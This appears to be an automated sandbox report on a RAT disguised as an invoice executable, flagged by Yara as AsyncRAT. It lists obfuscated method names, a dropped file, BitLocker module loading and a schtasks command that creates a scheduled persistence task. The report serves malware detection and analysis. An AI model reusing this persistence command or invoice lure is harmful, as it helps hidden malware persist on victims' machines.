Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, h4lYD5IJa5m0H7VCFS.cs	High entropy of concatenated method names: 'ToString', 'e71AymKn53', 'Le6AhCnsm6', 'alhArGaOK8', 'FNyAU4PoXC', 't3TAi6Rdsf', 'PpvARgwcpk', 'kHTAdsPa93', 'fUaAuPD1jM', 'ATdA2IuWYg'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, EklOXQ47wlfNTuHg21.cs	High entropy of concatenated method names: 'FKcF2ZWva', 'eV97RrEYa', 'HfrQ1aNUg', 'tUR6oicAr', 'lMXt4spr7', 'J1ckK406T', 'CGxoZqYughXDxt9HGS', 'hQtNHVwnZUHPdBUUYY', 'rEjEFUlLC', 'bsaTTY20M'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, kt5pdYHmXsR4vfWNE9.cs	High entropy of concatenated method names: 'XHcCjVL22N', 'hhHCt3ytRQ', 'BUHCP5V9nf', 'g14Chov5jZ', 'zMhCUxxMOu', 'YmYCiTHsL9', 'dTcCdRQClQ', 'ywNCu7h8IX', 'At1CgImxEI', 'kMCCya9ht1'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, H8HxJ7t2s1tCvkvPPw.cs	High entropy of concatenated method names: 'cNPm7Vofpa', 'GHmmQhwEul', 'rBHmjW9sNG', 'bOOmtrcLLY', 'aecm0k51ff', 'Kw5mAZqw3h', 'kyXmV8RX2k', 'SqpmEATnlM', 'A1Tmx3hEO8', 'WtxmTVYGF3'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, HVXTMmNBdL0eEbmBcN.cs	High entropy of concatenated method names: 'mkJTmprh9B', 'aHMTnjovso', 'ALlT5t1x7x', 'cEcTlrYlAt', 'XKtTxZtSaI', 'o5TTD5NWkp', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, V3ndQtvfQvQpVGc2MJ.cs	High entropy of concatenated method names: 'CfmxPWWQ2v', 'pmlxhoHRVr', 'xD8xr3ZHSL', 'ub6xUUpZJj', 'ac2xiIIUto', 'aytxRsvYK4', 'kVvxduqdPP', 'QrKxu7IHtw', 'Yc5x2qGHbB', 'JOKxgcI5xc'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, hISyLRzJbYpQYFqw0n.cs	High entropy of concatenated method names: 'DIBTQI2SUF', 'A7qTj37lTd', 'oi2Tt8Ql81', 'fntTPMybtu', 'SaxThVTLAc', 'VCFTUuteWR', 'aRcTi6M4Mu', 'T43TfFqyMQ', 'cLGT1uiiNF', 'au5TckkRcp'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, C0iQR0D43d47cjyFBd.cs	High entropy of concatenated method names: 'OlnwaYyTkn', 'RaZw91HoGs', 'tBfwOWRNEr', 'w96wmekS9S', 'utvwnae0Ov', 'ADYw55uYTY', 'FCTwlvDQGR', 'O8WwDZqoHp', 'h5CwbPTOuO', 'c8fwYOCgPk'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, iXWQNROBtkFQiV4I7E.cs	High entropy of concatenated method names: 'Dispose', 'oapMv8DJqM', 'EJN4hM0U6Q', 'LEfksvcLN6', 'FUdMN3V7Py', 'cgvMzt1o3X', 'ProcessDialogKey', 'JZq4L3ndQt', 'xQv4MQpVGc', 'MMJ44hVXTM'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, wfPo0aP0fgAaJ3wKuG.cs	High entropy of concatenated method names: 'hpp5aTgEpX', 'KRd5O12AdP', 'ePK5nGv0PG', 'PNw5ln6JD4', 'Imj5DLhHnh', 'zERn3r35G3', 'E1XneSU7bs', 'R0vnq0pP3e', 'jhJnWlUAKv', 'f3UnvDuVu6'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, dRxsWOSkbOtfmAp83S.cs	High entropy of concatenated method names: 'vqgVYwv7Zj', 'KbjVKrsTGV', 'ToString', 'dCbV9YS3I5', 'SN0VOBTAuG', 'sW5VmEfKHY', 'QklVnudiFY', 'AoBV5MyHYv', 'XHoVl98us6', 'jI2VDlnKpS'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, P7pQ2rs9fTNQTET8uj.cs	High entropy of concatenated method names: 'QFv0gn6ndv', 'rjk0pLiD5T', 'wLX0sdBKEp', 'SBT0ooITOO', 'kBs0hW6WXU', 'dQo0rtgEfP', 'mIZ0U3KnFe', 'r6A0iLaxvP', 'EpV0R00NJy', 'ms40d4Qwks'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, LYe286dRWyMXy75FBn.cs	High entropy of concatenated method names: 'ikkl9ntruK', 'Y3ulmF15Ex', 'qiml5un4TB', 'dve5NaKLP1', 'Itq5zE64Xw', 'zDDlL6WqLu', 'aeElMRWJSM', 'C84l4yb9gR', 'A4olwR1jH4', 'RdJlG24ym5'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, TJ7KcYqQH0ap8DJqMk.cs	High entropy of concatenated method names: 'S6fx0mgpBd', 'MZWxVgao9Y', 'ToAxxba51i', 'UOIxJcUJmo', 'PjLxXk1fRR', 'OQFxfnTiAf', 'Dispose', 've8E9tMbJV', 'ix5EO9Js5H', 'jb1Em6I3dj'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, kGdoZrhGfmLGMyS8UW.cs	High entropy of concatenated method names: 'aPnEqBdgaZ3YRefv2Zh', 'rSwMyodXcR4jIFueqpb', 'cjE5EWPHCy', 'fNp5xD1eWv', 'WZT5Tx8teg', 'CBWQYud3EKxKsVV1pU3', 'AGystFd0UsAljekEOr7'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, xOrxTajS3eLdlREM37.cs	High entropy of concatenated method names: 'R1wOsqHiAS', 'zyZOoAEtiw', 'JD8OIZCBsJ', 'sOvOSDa1W3', 'MQXO3CbP3s', 'O46OePwaq9', 'r00Oq9gao5', 'LnKOWpLXmt', 'YkyOvnaOaS', 'DQkONULkBC'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, wnafTfGOq4Qp8i9Udd.cs	High entropy of concatenated method names: 'md1MlOrxTa', 'T3eMDLdlRE', 'A2sMY1tCvk', 'YPPMKwCt9Y', 'g64M02wBfP', 'R0aMA0fgAa', 'zj1K668ZBc1O2tVYQL', 'AHy81d4jysa48mOIZQ', 'CoYMMMVoE4', 'IoFMwexnpC'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, R2hAFDMMXBFIQMXKngc.cs	High entropy of concatenated method names: 'SEaTNZBUiB', 'rsHTz3G7ue', 'iSvJL4Xhhe', 'tidJMohQLi', 'OGkJ4SuFyW', 'eJFJwcJ5ls', 'iEeJGjQpfq', 'NNIJa3xulG', 'XwYJ90G0GU', 'VN5JO59tvW'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, j3gNRt2XrVAVmnRRAA.cs	High entropy of concatenated method names: 'kWBl1YaDmm', 'zXTlcpsWxC', 'sZxlFmIsX7', 'Hkvl7rGAnP', 'ksLlZxDxnp', 'QBclQB6UPB', 'WVkl6ne13X', 'jOxljU00yv', 'awKltvfRH6', 'kBelkTtHeL'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, h4lYD5IJa5m0H7VCFS.cs	High entropy of concatenated method names: 'ToString', 'e71AymKn53', 'Le6AhCnsm6', 'alhArGaOK8', 'FNyAU4PoXC', 't3TAi6Rdsf', 'PpvARgwcpk', 'kHTAdsPa93', 'fUaAuPD1jM', 'ATdA2IuWYg'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, EklOXQ47wlfNTuHg21.cs	High entropy of concatenated method names: 'FKcF2ZWva', 'eV97RrEYa', 'HfrQ1aNUg', 'tUR6oicAr', 'lMXt4spr7', 'J1ckK406T', 'CGxoZqYughXDxt9HGS', 'hQtNHVwnZUHPdBUUYY', 'rEjEFUlLC', 'bsaTTY20M'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, kt5pdYHmXsR4vfWNE9.cs	High entropy of concatenated method names: 'XHcCjVL22N', 'hhHCt3ytRQ', 'BUHCP5V9nf', 'g14Chov5jZ', 'zMhCUxxMOu', 'YmYCiTHsL9', 'dTcCdRQClQ', 'ywNCu7h8IX', 'At1CgImxEI', 'kMCCya9ht1'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, H8HxJ7t2s1tCvkvPPw.cs	High entropy of concatenated method names: 'cNPm7Vofpa', 'GHmmQhwEul', 'rBHmjW9sNG', 'bOOmtrcLLY', 'aecm0k51ff', 'Kw5mAZqw3h', 'kyXmV8RX2k', 'SqpmEATnlM', 'A1Tmx3hEO8', 'WtxmTVYGF3'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, HVXTMmNBdL0eEbmBcN.cs	High entropy of concatenated method names: 'mkJTmprh9B', 'aHMTnjovso', 'ALlT5t1x7x', 'cEcTlrYlAt', 'XKtTxZtSaI', 'o5TTD5NWkp', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, V3ndQtvfQvQpVGc2MJ.cs	High entropy of concatenated method names: 'CfmxPWWQ2v', 'pmlxhoHRVr', 'xD8xr3ZHSL', 'ub6xUUpZJj', 'ac2xiIIUto', 'aytxRsvYK4', 'kVvxduqdPP', 'QrKxu7IHtw', 'Yc5x2qGHbB', 'JOKxgcI5xc'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, hISyLRzJbYpQYFqw0n.cs	High entropy of concatenated method names: 'DIBTQI2SUF', 'A7qTj37lTd', 'oi2Tt8Ql81', 'fntTPMybtu', 'SaxThVTLAc', 'VCFTUuteWR', 'aRcTi6M4Mu', 'T43TfFqyMQ', 'cLGT1uiiNF', 'au5TckkRcp'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, C0iQR0D43d47cjyFBd.cs	High entropy of concatenated method names: 'OlnwaYyTkn', 'RaZw91HoGs', 'tBfwOWRNEr', 'w96wmekS9S', 'utvwnae0Ov', 'ADYw55uYTY', 'FCTwlvDQGR', 'O8WwDZqoHp', 'h5CwbPTOuO', 'c8fwYOCgPk'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, iXWQNROBtkFQiV4I7E.cs	High entropy of concatenated method names: 'Dispose', 'oapMv8DJqM', 'EJN4hM0U6Q', 'LEfksvcLN6', 'FUdMN3V7Py', 'cgvMzt1o3X', 'ProcessDialogKey', 'JZq4L3ndQt', 'xQv4MQpVGc', 'MMJ44hVXTM'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, wfPo0aP0fgAaJ3wKuG.cs	High entropy of concatenated method names: 'hpp5aTgEpX', 'KRd5O12AdP', 'ePK5nGv0PG', 'PNw5ln6JD4', 'Imj5DLhHnh', 'zERn3r35G3', 'E1XneSU7bs', 'R0vnq0pP3e', 'jhJnWlUAKv', 'f3UnvDuVu6'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, dRxsWOSkbOtfmAp83S.cs	High entropy of concatenated method names: 'vqgVYwv7Zj', 'KbjVKrsTGV', 'ToString', 'dCbV9YS3I5', 'SN0VOBTAuG', 'sW5VmEfKHY', 'QklVnudiFY', 'AoBV5MyHYv', 'XHoVl98us6', 'jI2VDlnKpS'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, P7pQ2rs9fTNQTET8uj.cs	High entropy of concatenated method names: 'QFv0gn6ndv', 'rjk0pLiD5T', 'wLX0sdBKEp', 'SBT0ooITOO', 'kBs0hW6WXU', 'dQo0rtgEfP', 'mIZ0U3KnFe', 'r6A0iLaxvP', 'EpV0R00NJy', 'ms40d4Qwks'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, LYe286dRWyMXy75FBn.cs	High entropy of concatenated method names: 'ikkl9ntruK', 'Y3ulmF15Ex', 'qiml5un4TB', 'dve5NaKLP1', 'Itq5zE64Xw', 'zDDlL6WqLu', 'aeElMRWJSM', 'C84l4yb9gR', 'A4olwR1jH4', 'RdJlG24ym5'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, TJ7KcYqQH0ap8DJqMk.cs	High entropy of concatenated method names: 'S6fx0mgpBd', 'MZWxVgao9Y', 'ToAxxba51i', 'UOIxJcUJmo', 'PjLxXk1fRR', 'OQFxfnTiAf', 'Dispose', 've8E9tMbJV', 'ix5EO9Js5H', 'jb1Em6I3dj'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, kGdoZrhGfmLGMyS8UW.cs	High entropy of concatenated method names: 'aPnEqBdgaZ3YRefv2Zh', 'rSwMyodXcR4jIFueqpb', 'cjE5EWPHCy', 'fNp5xD1eWv', 'WZT5Tx8teg', 'CBWQYud3EKxKsVV1pU3', 'AGystFd0UsAljekEOr7'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, xOrxTajS3eLdlREM37.cs	High entropy of concatenated method names: 'R1wOsqHiAS', 'zyZOoAEtiw', 'JD8OIZCBsJ', 'sOvOSDa1W3', 'MQXO3CbP3s', 'O46OePwaq9', 'r00Oq9gao5', 'LnKOWpLXmt', 'YkyOvnaOaS', 'DQkONULkBC'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, wnafTfGOq4Qp8i9Udd.cs	High entropy of concatenated method names: 'md1MlOrxTa', 'T3eMDLdlRE', 'A2sMY1tCvk', 'YPPMKwCt9Y', 'g64M02wBfP', 'R0aMA0fgAa', 'zj1K668ZBc1O2tVYQL', 'AHy81d4jysa48mOIZQ', 'CoYMMMVoE4', 'IoFMwexnpC'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, R2hAFDMMXBFIQMXKngc.cs	High entropy of concatenated method names: 'SEaTNZBUiB', 'rsHTz3G7ue', 'iSvJL4Xhhe', 'tidJMohQLi', 'OGkJ4SuFyW', 'eJFJwcJ5ls', 'iEeJGjQpfq', 'NNIJa3xulG', 'XwYJ90G0GU', 'VN5JO59tvW'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, j3gNRt2XrVAVmnRRAA.cs	High entropy of concatenated method names: 'kWBl1YaDmm', 'zXTlcpsWxC', 'sZxlFmIsX7', 'Hkvl7rGAnP', 'ksLlZxDxnp', 'QBclQB6UPB', 'WVkl6ne13X', 'jOxljU00yv', 'awKltvfRH6', 'kBelkTtHeL'

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	File created: \invoice-bl. payment tt $ 28,945.99.exe
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	File created: \invoice-bl. payment tt $ 28,945.99.exe
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	File created: \invoice-bl. payment tt $ 28,945.99.exe
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	File created: \invoice-bl. payment tt $ 28,945.99.exe
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	File created: \invoice-bl. payment tt $ 28,945.99.exe
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	File created: \invoice-bl. payment tt $ 28,945.99.exe	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	File created: \invoice-bl. payment tt $ 28,945.99.exe	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	File created: \invoice-bl. payment tt $ 28,945.99.exe	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	File created: \invoice-bl. payment tt $ 28,945.99.exe	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	File created: \invoice-bl. payment tt $ 28,945.99.exe	Jump to behavior

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe

File created: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe

Jump to dropped file

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.SFHAWxtoIpgL.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4114120570.0000000000420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 3848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 7276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SFHAWxtoIpgL.exe PID: 7308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SFHAWxtoIpgL.exe PID: 7620, type: MEMORYSTR

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SFHAWxtoIpgL" /XML "C:\Users\user\AppData\Local\Temp\tmp532A.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
